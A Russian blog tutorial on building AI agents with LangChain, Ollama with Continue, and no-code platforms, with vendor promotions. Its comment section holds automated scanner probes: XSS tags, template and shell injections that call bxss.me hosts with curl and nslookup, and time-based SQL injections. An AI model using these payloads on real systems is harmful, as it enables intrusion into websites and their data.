Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie
Subscribe
Прямой эфир
Cryptocurrencies: 9469 / Markets: 114759
Market Cap: $ 3 649 413 147 676 / 24h Vol: $ 111 462 614 249 / BTC Dominance: 58.888008521454%

Н Новости

Как я создал ИИ-агента, который решает задачи быстрее, чем я нахожу оправдания

За 19 лет в айти я многое повидал. И не буду скрывать, что ИИ тоже успел стать моим рабочим инструментом.

Сложно удержатся, когда даже коллеги-менеджеры натаскивают его на автоматический сбор отчётов и контроль дедлайнов, а знакомые аналитики гоняют их по таблицам с данными — те вытаскивают тренды и аномалии за пару минут.

Но я захотел собрать личного ИИ-агента. Попробовал разные способы и выделил 3 из них. В статье расскажу, какие подходы пробовал (с кодом и без), на чём остановился, что сработало, а что — не очень. Покажу, как быстро сделать своего ИИ-помощника новичку и старичку опытному специалисту.

Оглавление

  1. Как работают AI-агенты

  2. Три подхода к созданию AI-агентов

  3. Практическая часть: Создание ИИ-агента

  4. Можно ли использовать AI-агентов в вашей профессии

Как работают AI-агенты

Если упростить, AI-агент — это программа, которую можно встроить в свой стек и настроить под конкретные проекты: не просто «поиск в гугле», а полноценная работа с кодом, данными или проектными задачами.

Под капотом у большинства ИИ-агентов — большие языковые модели (LLM): Mistral, Llama, OpenAI GPT и др. Они обучены на больших датасетах и умеют обрабатывать текст, генерировать ответы и выполнять команды.

Структура работы агента выглядит примерно так:

  1. Запрос. Пользователь формулирует задачу: например, «напиши функцию на Python для сортировки списка» или «собери план проекта». Агент (через LLM) интерпретирует запрос, извлекает контекст и определяет цель.

  2. Интеграция с инструментами. Для выполнения более сложных задач агент подключается к внешним инструментам: API, поисковикам, базам данных, файловым системам или IDE. Например, может сделать поиск в интернете или взаимодействовать с API IDE для анализа кода.

  3. Планирование и выполнение действий. После интерпретации задачи агент решает, какие шаги предпринять: сгенерировать ответ, написать код, провести вычисления, собрать данные и т.п. Некоторые агенты реализуют паттерн react-description — динамически разбивают задачу на шаги и последовательно их отрабатывают.

  4. Адаптация под пользователя. Если есть механизм обратной связи, агент со временем подстраивается под стиль работы. Например, я обучал ИИ генерировать код в определённом стиле или учитывать корпоративные стандарты документации.

В плане реализации я чаще использую фреймворки вроде LangChain — он хорошо справляется с оркестрацией LLM и интеграцией со внешними источниками. Агент может работать локально (например, с Ollama), или через облачные платформы (типа Relevance AI).

Три подхода к созданию AI-агентов

Создать собственного AI-агента сейчас вполне реально — и не только разработчикам. Всё зависит от того, насколько глубоко вы хотите залезать в код и стек.

Сначала расскажу про 3 подхода, которые сам пробовал: фреймворки для полной кастомизации, локальные инструменты — когда важна конфиденциальность, и no-code решения — если нужен быстрый результат без программирования. У каждого варианта есть свои плюсы, и выбор зависит от задач и уровня подготовки.

Фреймворки (LangChain, LlamaIndex): полный контроль и кастомизация

Уровень кастомизации: высокий

Что нужно уметь: программировать на Python

Инструменты: LangChain, LlamaIndex, crewAI

Когда применять: если нужен агент «под ключ» с полной кастомизацией — пишете логику сами, подключаете нужные API, управляете пайплайном. Подход для тех, кто хочет именно разработать агента под свои задачи, а не просто собрать из готовых блоков.

427d8249dbd7cc1bdcb5d4cc06ad8903.pngb6fb0c19a409cecce07272c99089b0e1.png
8bb5aaa16323e9cf688235a01a1ea9f8.png

Фреймворки вроде LangChain, LlamaIndex и crewAI дают довольно гибкий инструмент для сборки кастомных AI-агентов. С их помощью можно собрать пайплайн, который будет выполнять нетривиальные задачи: от генерации кода и парсинга данных до автоматизации бизнес-процессов.

Например, LangChain позволяет легко интегрировать LLM с внешними API, базами данных, поисковыми системами. Плюс — даёт возможность управлять памятью ИИ-агента (чтобы он сохранял контекст диалога или цепочки задач).

В итоге на основе LangChain я собирал агента, который помогает писать и рефакторить код; вытаскивает релевантные куски из документации, автоматизирует первичный анализ логов. А коллеги использовали связку с CRM — чтобы агент автоматически готовил отчёты и подсвечивал аномальные значения в данных.

Минус у подхода ровно один — нужно уметь писать на Python и быть готовым повозиться с документацией фреймворка. Но если хотите полную кастомизацию под свои задачи — это один из лучших вариантов.

Локальные инструменты (Ollama, Continue): конфиденциальность и простота настройки

0a7506e796d21d0fef739dafb7ffb66f.pnge020463d06d43ad6926a7917fe33bb97.png

Уровень кастомизации: средний
Что нужно уметь: базовая настройка ПО
Инструменты: Ollama, Continue (плагин для VS Code)
Когда применять: если важно запускать агента локально и контролировать, куда уходят данные.

Локальные инструменты — хороший вариант, если вы работаете с конфиденциальной информацией или просто не хотите отправлять данные в облако.

Например, Ollama позволяет локально запускать LLM (например, Mistral или другие open-source модели) прямо на своём ПК. В связке с плагином Continue для VS Code получается довольно удобный рабочий агент прямо внутри IDE.

Он может:
— подсказывать по коду,
— генерировать куски функций,
— помогать с отладкой,
— генерировать идеи по архитектуре решения.

Как я использовал: поднял Ollama + Continue для автодополнения и объяснения кода в VS Code. Заодно тестировал работу с локальными CSV — удобно для быстрой аналитики без выхода в сеть.

Из плюсов — настройка занимает буквально 15–20 минут: скачал Ollama, загрузил модель, поставил плагин — и можно работать. Из минусов — модели всё же легче, чем облачные GPT, так что сложные запросы требуют аккуратной промпт-инженерии.

No-code платформы (Relevance AI, CodeGPT): быстрое создание без программирования

7cb4b56e8b8e1d42184238b4d995540f.pngefd17d366b94779122817285e4fd15d2.png

Уровень кастомизации: низкий
Что нужно уметь: ничего, только тыкать мышкой
Инструменты: Relevance AI, CodeGPT
Когда применять: если нужно быстро собрать рабочего агента без написания кода.

Если нет времени разбираться с фреймворками или писать свой пайплайн, можно пойти по пути no-code. Платформы вроде Relevance AI и CodeGPT позволяют буквально за пару минут собрать простого ИИ-агента через визуальный интерфейс.

Варианты применения:

  • в Relevance AI можно быстро собрать агента, который, например, будет формировать сводки по задачам или вытаскивать ключевые метрики из корпоративных данных;

  • в CodeGPT удобно настроить агента для генерации небольших скриптов или вспомогательных функций.

Как я использовал: делал на Relevance AI прототип для автоматизации отчётов по проектам. Хорошо подходит для быстрых MVP или проверки гипотез: посмотреть, как будет работать связка «агент + конкретная задача» без необходимости писать backend-логику.

Минус очевиден — кастомизации практически нет: вы работаете в рамках того, что предлагает платформа. Но, если нужно быстрое решение «на попробовать» или для нетехнических пользователей — такой вариант вполне рабочий.


А если вы внедряете ИИ в компании — познакомьтесь ближе с продуктами Minervasoft. В системе управления знаниями Minerva Knowledge есть технология DataHub, которая позволяет легко создать корпоративный «мозг» для GenAI и объединить любые источники информации, в том числе внутренние системы, базы знаний и другие хранилища данных.

К платформе можно подключить помощника с генеративным AI. Minerva Copilot полностью защищён и работает без интернета на базе технологий различных провайдеров: Naumen, AutoFAQ и других партнёров. Он встраивается в любую рабочую систему и даёт точные ответы на вопросы сотрудника со ссылкой на материалы из Minerva Knowledge. Быстро, качественно и с учётом контекста.

Попробовать продукты Minervasoft

Переходим к практике: создаём своего ИИ-агента

Теперь перехожу к конкретным примерам трёх подходов, о которых говорил выше: через фреймворки (на базе LangChain), локальные инструменты (Ollama + Continue в VS Code) и no-code платформы (Relevance AI, CodeGPT). Подготовил шаблоны как для новичков, так и для профессионалов.

Фреймворки (LangChain): Шаблоны для новичков и профессионалов

ce055731b1c4b5e51d607fb1505217ca.png

Пошаговая инструкция: Базовый AI-агент для поиска информации с LangChain

Эти шаги помогут вам создать вашего AI-агента, который сможет искать информацию в интернете и формировать ответ, используя библиотеку LangChain.

Что понадобится:

  1. Python 3.8+: Убедитесь, что у вас установлена подходящая версия Python. Если нет, вы можете скачать ее с официального сайта Python.

  2. LangChain: Библиотека, которая упрощает создание приложений на основе больших языковых моделей.

  3. API-ключ для доступа к LLM (Large Language Model): Это может быть OpenAI (самый распространенный вариант для новичков) или Hugging Face. Этот ключ позволит вашему агенту взаимодействовать с мощными языковыми моделями.

  4. API-ключ для SerpAPI или аналогичного сервиса: Для инструмента поиска Google Search, который мы будем использовать, потребуется API-ключ от сервиса, который предоставляет доступ к поисковым результатам. SerpAPI — один из таких сервисов.


Шаг 1: Подготовка окружения и установка зависимостей

Установите Python (если еще не установлен):

  • Перейдите на официальный сайт Python.

  • Скачайте и установите последнюю версию Python 3.8 или выше, следуя инструкциям для вашей операционной системы. Обязательно поставьте галочку "Add Python to PATH" во время установки на Windows.

python -m venv ai_agent_env

4. Активируйте виртуальное окружение:
На Windows:

.\ai_agent_env\Scripts\activate

На macOS/Linux:

source ai_agent_env/bin/activate
  1. Вы увидите (ai_agent_env) перед вашей командной строкой. Это означает, что виртуальное окружение активно.

  2. Установите необходимые библиотеки:

pip install langchain openai google-search-results
  • langchain: Основная библиотека для создания агента.

  • openai: Клиентская библиотека для работы с API OpenAI.

  • google-search-results: Эта библиотека используется LangChain для работы с SerpAPI, который предоставляет доступ к результатам поиска Google.


Шаг 2: Получение API-ключей

Для работы агента вам понадобятся два API-ключа:

  1. API-ключ OpenAI:

    • Перейдите на сайт OpenAI.

    • Зарегистрируйтесь или войдите в свою учетную запись.

    • После входа в систему перейдите в раздел "API keys" (обычно в меню слева или в настройках профиля).

    • Нажмите "Create new secret key" и скопируйте сгенерированный ключ. Сохраните его в надежном месте, так как он будет показан только один раз.

  2. API-ключ SerpAPI:

    • Перейдите на сайт SerpAPI.

    • Зарегистрируйтесь или войдите в свою учетную запись.

    • После входа в систему, ваш API-ключ обычно отображается на панели управления ("Dashboard"). Скопируйте его.


Шаг 3: Написание кода вашего AI-агента

Создайте новый файл Python:

  • В вашей рабочей директории (например, в папке ai_agent_env) создайте новый файл, например, agent_app.py.

  • Откройте этот файл в любом текстовом редакторе или IDE (например, VS Code, PyCharm, Sublime Text).

Вставьте следующий код:

from langchain.agents import load_tools, initialize_agent, AgentType
from langchain_openai import OpenAI # Изменено для новой версии LangChain

# 1. Укажите ваши API-ключи
# Рекомендуется хранить ключи в переменных окружения для безопасности
# Например, установите их в вашей системе как OPENAI_API_KEY и SERPAPI_API_KEY
# Для этого примера мы пока вставим их напрямую, но имейте в виду лучшую практику.

# ЗАМЕНИТЕ 'ВАШ_API_КЛЮЧ_OPENAI' на ваш актуальный ключ OpenAI
# ЗАМЕНИТЕ 'ВАШ_API_КЛЮЧ_SERPAPI' на ваш актуальный ключ SerpAPI
openai_api_key = "ВАШ_API_КЛЮЧ_OPENAI"
serpapi_api_key = "ВАШ_API_КЛЮЧ_SERPAPI"

# 2. Инициализация LLM (Large Language Model)
# Мы используем OpenAI в качестве модели.
# temperature=0 делает ответы модели более детерминированными (менее случайными).
llm = OpenAI(openai_api_key=openai_api_key, temperature=0)

# 3. Загрузка инструмента для поиска
# "google-search" - это инструмент, который использует SerpAPI для выполнения поиска в Google.
# Для этого инструмента нужен API-ключ SerpAPI, который мы передаем через environment variable
# или, как в нашем случае, указываем явно при загрузке.
tools = load_tools(["serpapi"], llm=llm, serpapi_api_key=serpapi_api_key)

# 4. Инициализация агента
# tools: Список инструментов, которые агент может использовать.
# llm: Большая языковая модель, которую агент использует для рассуждений.
# agent="zero-shot-react-description": Это тип агента. Он использует модель ReAct
# (Reasoning and Acting) для принятия решений о том, какой инструмент использовать и как рассуждать.
# verbose=True: Включает подробный вывод, который показывает, как агент принимает решения
# и какие шаги выполняет. Это очень полезно для отладки и понимания работы агента.
# agent_type=AgentType.ZERO_SHOT_REACT_DESCRIPTION: Это более современный способ указания типа агента.
agent = initialize_agent(
    tools,
    llm,
    agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, # Изменено для новой версии LangChain
    verbose=True
)

# 5. Запрос к агенту
# Здесь вы формулируете свой вопрос, который агент будет пытаться решить.
print("Запрос к агенту: 'Как создать AI-агента с LangChain?'")
response = agent.run("Как создать AI-агента с LangChain?")

# 6. Вывод ответа агента
print("\n--- Ответ агента ---")
print(response)
  1. Замените заглушки API-ключей:

    • Найдите строку openai_api_key = "ВАШ_API_КЛЮЧ_OPENAI" и замените "ВАШ_API_КЛЮЧ_OPENAI" на ваш реальный API-ключ OpenAI.

    • Найдите строку serpapi_api_key = "ВАШ_API_КЛЮЧ_SERPAPI" и замените "ВАШ_API_КЛЮЧ_SERPAPI" на ваш реальный API-ключ SerpAPI.

  2. Важное примечание по безопасности: В реальных проектах никогда не храните API-ключи непосредственно в коде. Вместо этого используйте переменные окружения (например, os.environ.get("OPENAI_API_KEY")) или другие безопасные методы хранения секретов.


Шаг 4: Запуск вашего AI-агента

Убедитесь, что ваше виртуальное окружение активно. Если вы закрыли терминал, вам нужно снова активировать его (Шаг 1, пункт 4).

Запустите скрипт Python:
В том же терминале, где активно виртуальное окружение, перейдите в директорию, где вы сохранили agent_app.py (если вы там еще не находитесь), и выполните команду:

python agent_app.py

Шаг 5: Анализ вывода

Когда вы запустите скрипт, вы увидите подробный вывод (благодаря verbose=True):

  • Вы увидите, как агент "думает" (Thought).

  • Он будет решать, какой Action (действие) предпринять, например, использовать serpapi_Google Search.

  • Затем он покажет Action Input (входные данные для действия), т.е. поисковый запрос.

  • После выполнения поиска он покажет Observation (наблюдение) — результаты поиска, полученные от SerpAPI.

  • Агент может повторять эти шаги, если ему нужно уточнить информацию или провести дополнительные поиски.

  • В конце он сформирует Final Answer (конечный ответ) на ваш запрос.


Возможные проблемы и их решения:

  • "API-ключ недействителен" / "Недостаточно средств": Проверьте правильность ваших API-ключей и убедитесь, что на вашем аккаунте OpenAI достаточно кредитов.

  • "Could not load tool google-search..." / "No such tool found": Убедитесь, что вы правильно установили google-search-results (pip install google-search-results) и что ваш ключ SerpAPI действителен. В новых версиях LangChain инструмент google-search может быть заменен на serpapi, как я исправил в коде выше.

  • Ошибки, связанные с версиями LangChain: Библиотека LangChain активно развивается. Если вы видите ошибки, связанные с импортами или функциями, возможно, вы используете более новую или старую версию. Попробуйте обновить LangChain (pip install --upgrade langchain) или обратиться к официальной документации LangChain для вашей версии. Я обновил код, чтобы он соответствовал более актуальным импортам LangChain.

  • "Rate limit exceeded": Вы сделали слишком много запросов за короткий период времени. Подождите немного и попробуйте снова.


Пошаговая инструкция: ИИ-агент с интеграцией инструментов и памятью диалога

Этот гайд покажет вам, как создать более сложного AI-агента, который может не только выполнять вычисления, но и "помнить" предыдущие шаги диалога, что позволяет ему обрабатывать последовательные запросы с учетом контекста.

Что понадобится:

  1. Python 3.8+: Установленная версия Python.

  2. LangChain: Основная библиотека для создания агентов.

  3. API-ключ для доступа к LLM (например, OpenAI): Для взаимодействия с большой языковой моделью.


Шаг 1: Подготовка окружения и установка зависимостей

  1. Откройте терминал или командную строку.

  2. Активируйте ваше виртуальное окружение (если вы создавали его ранее, как рекомендовано в предыдущей инструкции). Если нет, можете создать новое:

    • Создать новое виртуальное окружение: python -m venv advanced_agent_env

    • Активировать на Windows: .\advanced_agent_env\Scripts\activate

    • Активировать на macOS/Linux: source advanced_agent_env/bin/activate

  3. Установите необходимые библиотеки:

pip install langchain openai
  • langchain: Основная библиотека.

  • openai: Клиентская библиотека для OpenAI.

  1. Обратите внимание: В данном примере не требуется SerpAPI, так как мы не используем инструмент поиска Google. Вместо этого мы будем использовать инструмент для математических вычислений (llm-math).


Шаг 2: Получение API-ключа OpenAI

  1. Если у вас еще нет API-ключа OpenAI, получите его, следуя инструкциям из предыдущего гайда:

    • Перейдите на сайт OpenAI.

    • Зарегистрируйтесь/войдите.

    • Перейдите в раздел "API keys" и создайте новый секретный ключ. Сохраните его!


Шаг 3: Написание кода вашего AI-агента с памятью

  1. Создайте новый файл Python:

    • В вашей рабочей директории (например, в папке advanced_agent_env) создайте новый файл, например, memory_agent_app.py.

    • Откройте этот файл в вашем текстовом редакторе или IDE.

  2. Вставьте следующий код:
    Python

from langchain.agents import load_tools, initialize_agent, AgentType
from langchain_openai import OpenAI # Импорт из langchain_openai для новых версий
from langchain.memory import ConversationBufferMemory # Класс для работы с памятью

# 1. Укажите ваш API-ключ OpenAI
# ЗАМЕНИТЕ 'ВАШ_API_КЛЮЧ_OPENAI' на ваш актуальный ключ OpenAI
openai_api_key = "ВАШ_API_КЛЮЧ_OPENAI"

# 2. Инициализация LLM (Large Language Model)
# temperature=0 делает ответы модели более детерминированными (менее творческими).
llm = OpenAI(openai_api_key=openai_api_key, temperature=0)

# 3. Загрузка инструментов
# "llm-math": Это инструмент, который позволяет агенту выполнять математические вычисления.
# LLM сама по себе не всегда идеально справляется с точными вычислениями,
# поэтому делегирование этой задачи специализированному инструменту повышает точность.
# Инструмент llm-math внутренне использует LLM для парсинга выражения,
# поэтому передача llm в load_tools является обязательной.
tools = load_tools(["llm-math"], llm=llm)

# 4. Инициализация памяти для агента
# ConversationBufferMemory: Простой тип памяти, который хранит всю историю диалога.
# memory_key="chat_history": Имя ключа, под которым история диалога будет доступна LLM.
# Это важно, так как модель будет использовать этот ключ для доступа к контексту.
memory = ConversationBufferMemory(memory_key="chat_history")

# 5. Инициализация агента с памятью
# tools: Список инструментов, которые агент может использовать.
# llm: Большая языковая модель для рассуждений и генерации ответов.
# agent="conversational-react-description": Этот тип агента разработан специально
# для поддержки диалогов с памятью. Он также использует парадигму ReAct.
# memory: Объект памяти, который будет передаваться агенту.
# verbose=True: Включает подробный вывод, который показывает внутренние шаги агента.
# Это особенно полезно для отладки и понимания, как агент использует память.
agent = initialize_agent(
    tools,
    llm,
    agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION, # Изменено для новой версии LangChain
    memory=memory,
    verbose=True
)

# 6. Примеры взаимодействия
print("--- Первый запрос ---")
response1 = agent.run("Сколько будет 15% от 200?")
print(f"Ответ агента 1: {response1}\n")

print("--- Второй запрос (с использованием контекста) ---")
response2 = agent.run("А если прибавить к этому 50?")
print(f"Ответ агента 2: {response2}\n")

print("--- Третий запрос (с использованием контекста) ---")
response3 = agent.run("Вычти из этого 25.")
print(f"Ответ агента 3: {response3}\n")
# Вы можете продолжить диалог, чтобы увидеть, как агент сохраняет контекст.
# print("--- Четвертый запрос ---")
# response4 = agent.run("Что такое LangChain?")
# print(f"Ответ агента 4: {response4}\n") # Этот запрос не связан с вычислениями, но агент все равно помнит предыдущий диалог.
  1. Замените заглушку API-ключа:

    • Найдите строку openai_api_key = "ВАШ_API_КЛЮЧ_OPENAI" и замените "ВАШ_API_КЛЮЧ_OPENAI" на ваш реальный API-ключ OpenAI.


Шаг 4: Запуск вашего AI-агента

  1. Убедитесь, что ваше виртуальное окружение активно.

  2. Запустите скрипт Python:
    В терминале, где активно виртуальное окружение, выполните команду:

python memory_agent_app.py

Шаг 5: Анализ вывода

Когда вы запустите скрипт, обратите внимание на подробный вывод (verbose=True).

  • Первый запрос (Сколько будет 15% от 200?):

    • Вы увидите, как агент "думает" и решает использовать инструмент Calculator (или llm-math в зависимости от внутренней реализации).

    • Он выполнит расчет и выдаст Final Answer.

  • Второй запрос (А если прибавить к этому 50?):

    • Здесь ключевое отличие: агент, благодаря ConversationBufferMemory, "помнит" предыдущий ответ (результат 15% от 200, который равен 30).

    • Вы увидите, что в Thought агента будет присутствовать история чата (chat_history), которая содержит предыдущие вопросы и ответы.

    • Агент поймет, что "к этому" относится к предыдущему результату, и прибавит 50 к 30.

  • Третий запрос (Вычти из этого 25.):

    • Аналогично, агент будет использовать текущий контекст диалога (предыдущий результат, 80) и вычтет из него 25.

Этот механизм памяти делает агента гораздо более полезным и интерактивным, позволяя ему вести связный диалог.


Возможные проблемы и их решения:

  • "API-ключ недействителен" / "Недостаточно средств": Проверьте правильность вашего API-ключа OpenAI и баланс на вашем аккаунте.

  • Ошибки импорта (from langchain.llms import OpenAI): В более новых версиях LangChain импорты для моделей перенесены в подпакеты, например, from langchain_openai import OpenAI. Я уже исправил это в коде выше. Убедитесь, что у вас установлена соответствующая версия LangChain или скорректируйте импорт.

  • Агент не "помнит": Убедитесь, что вы правильно инициализировали ConversationBufferMemory и передали ее в initialize_agent через параметр memory=memory. Также проверьте, что agent тип установлен на AgentType.CONVERSATIONAL_REACT_DESCRIPTION.

  • Неточности в вычислениях: Хотя llm-math повышает точность, сложные или неоднозначные формулировки могут иногда сбивать LLM при парсинге запроса для инструмента. Старайтесь формулировать запросы к вычислениям максимально четко.


Эта инструкция значительно расширяет возможности вашего агента, позволяя ему работать с контекстом и выполнять вычисления. Это важный шаг к созданию более сложных и интеллектуальных AI-приложений.

Локальные инструменты (Ollama, Continue): настройка и использование

В этом примере — как настроить локального AI-агента на базе Ollama + Continue для VS Code. Такой агент работает полностью локально и интегрируется прямо в IDE — помогает с генерацией и рефакторингом кода, даёт подсказки по синтаксису и структуре.

Шаги настройки:

  1. Устанавливаем Ollama на локальную машину (дистрибутив — на официальном сайте). Проверяем установку:

ollama --help
0d158943d831892df30850ea630dda29.png


В терминале или powershell окне запустите:

   ollama serve
4d2e4da495fc9a4535857887ed4aaaa1.png
   ollama run qwen2.5-coder:7b
0cac3fba35d979808659082258a45d2a.png

3. Установите расширение Continue в Visual Studio Code (доступно в marketplace).

4. Настройте Continue

5315a7247b3acfa866fbbe993b037e5e.png


Как описано в документации continue, нужно создать файл config.json:

{

  "models": [

    {

      "title": "Qwen2.5-Coder",

      "provider": "ollama",

      "model": "qwen2.5-coder:7b"

    }

  ]

}

Как использовать: после настройки — выделяем нужный фрагмент кода в VS Code, нажимаем Cmd + Shift + R (или соответствующую комбинацию на Windows). Вводим запрос — например:
«Объясни этот код» или «Исправь ошибку».

Агент обрабатывает запрос локально, без отправки данных в облако — что важно при работе с закрытым кодом или корпоративными проектами.

No-code платформы (Relevance AI, CodeGPT): Быстрая настройка

Relevance AI

Через Relevance AI можно собрать простого агента через визуальный интерфейс — без кода.

Шаги:

  • Заходим на Relevance AI, регистрируемся (достаточно бесплатного плана).

8005a6ff8984911677f8c93471544e37.png
  • Выбираем шаблон, например, "Habr Digital Writer".

5f8e8b9e171b8ce58a8a5e08400558bb.png
  • Настраиваем агента: в визуальном интерфейсе задаём, какие задачи он должен выполнять. Пример — «Собирай заголовки с англоязычного Хабра и формируй отчёт, чтобы было удобно выбрать, что почитать».

  • Запускаем агента и тестируем на простом запросе, например: «Проверь сайт и скажи, что почитать сегодня».

2846d195d04c54fe20b96d50dbb996db.pngd49df685b4fd4f48a7039e89feb2ed30.png

CodeGPT

CodeGPT — инструмент с уклоном на задачи для разработчиков. Позволяет генерировать код, писать функции, помогать с отладкой.

Шаги:

  1. Регистрируемся на CodeGPT.

d4a959ee08771b1dac2c99d7046cccb3.png
  • Выбираем шаблон "Coding Assistant"

  • Вводим запрос, например: "Напиши функцию на JavaScript для проверки палиндрома".

  • Агент сгенерирует код, который вы можете сразу использовать.

Пример кода от CodeGPT (гипотетический результат):

function isPalindrome(str) {

  const cleanStr = str.toLowerCase().replace(/[^a-z0-9]/g, '');

  return cleanStr === cleanStr.split('').reverse().join('');

}

console.log(isPalindrome("A man, a plan, a canal: Panama")); // true

console.log(isPalindrome("race a car")); // false

Как использовать: после генерации — копируем полученный код и вставляем в свою рабочую среду (IDE). Платформы вроде CodeGPT позволяют быстро получать такие сниппеты без необходимости писать их вручную — удобно для прототипирования и ускорения рутинных задач.

Можно ли использовать AI-агентов в вашей профессии?

9d038c70a035b590e846546233f49423.png

AI-агенты отлично ложатся на задачи из самых разных профессий. Вот где их реально применяют (и где я сам или коллеги тестировали такие кейсы):

  • Разработчики.
    Агенты помогают с генерацией кода, автодополнением, написанием тестов, разбором багов. Например, на LangChain можно собрать агента, который парсит документацию и подсказывает решения по API. Локальный агент на Ollama + Continue у меня работает прямо в VS Code — подсказывает по коду и оптимизирует функции без отправки данных наружу.

  • Менеджеры проектов.
    Агенты автоматизируют отчётность, трекинг задач, напоминания по проектам. Например, через Relevance AI собирали агента, который по крону формировал сводки по задачам и отправлял их в рабочие чаты.

  • Аналитики данных.
    Используют агентов для первичной обработки больших датасетов: разбор CSV, поиск аномалий, построение графиков. Хорошо работает в связке LangChain + Pandas API или через отдельные BI-интеграции.

  • Маркетологи.
    Агенты помогают анализировать эффективность кампаний, собирать тренды и генерировать контент (посты, тексты). Сам делал тестовый агент на LangChain, который парсил новостные фиды + соцсети по тематике проекта и формировал идеи для контента.

  • Творческие профессии (дизайн, тексты).
    Для дизайнеров и копирайтеров агенты помогают с генерацией идей, описаний, концептов. Простой кейс — CodeGPT для быстрого наброска описаний продуктов или Relevance AI для генерации moodboard-концепций по трендам.

  • Преподаватели и тренеры.
    Агенты генерируют тестовые вопросы, объясняют сложные темы, готовят учебные материалы. Для задач, где важна приватность (например, внутренняя методичка), удобно использовать локального агента на Ollama.

<h2 id="ogranicheniya-i-eticheskie-voprosy">Ограничения и этические вопросы</h2>

Несмотря на все плюсы, при работе с AI-агентами есть нюансы, которые стоит учитывать:

  • Точность и ошибки.
    LLM-модели не гарантируют 100% точности. Агент может вернуть устаревший или некорректный ответ, особенно если модель обучалась на неполных или предвзятых данных. Например, в коде — подсказать неоптимальное или небезопасное решение, в данных — некорректно интерпретировать числовые зависимости.

  • Конфиденциальность.
    При использовании облачных платформ часть данных уходит на внешние серверы. Для чувствительных задач (финансы, внутренние регламенты, корпоративный код) лучше использовать локальные решения — например, Ollama или корпоративные решения вроде Minerva Copilot, где модель работает внутри периметра компании.

  • Этические аспекты.
    Автоматическая генерация контента поднимает вопросы ответственности. Кто отвечает за ошибку или плагиат, сгенерированный агентом? Кроме того, стоит отслеживать, чтобы модель не усиливала встроенные предвзятости (например, в подборе рекомендаций или в маркетинговых анализах).

  • Зависимость от инструментов.
    Чрезмерная автоматизация рискует «размывать» навыки у новичков. Если на этапе обучения специалист сразу полагается на агента, есть риск, что он не разовьёт базовые компетенции в своей области. Тут важно держать баланс между автоматизацией и реальным пониманием процессов.

А вы пробовали создавать своих ИИ-агентов? Рассказывайте, какие способы тестировали!


У Minervasoft есть свой блог в Telegram. Там выходят статьи про ИИ и управление знаниями, обсуждаются спорные вопросы в найме, менеджменте и планировании. Подпишитесь, чтобы не пропустить новые тексты.

Блог Minervasoft

Источник

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

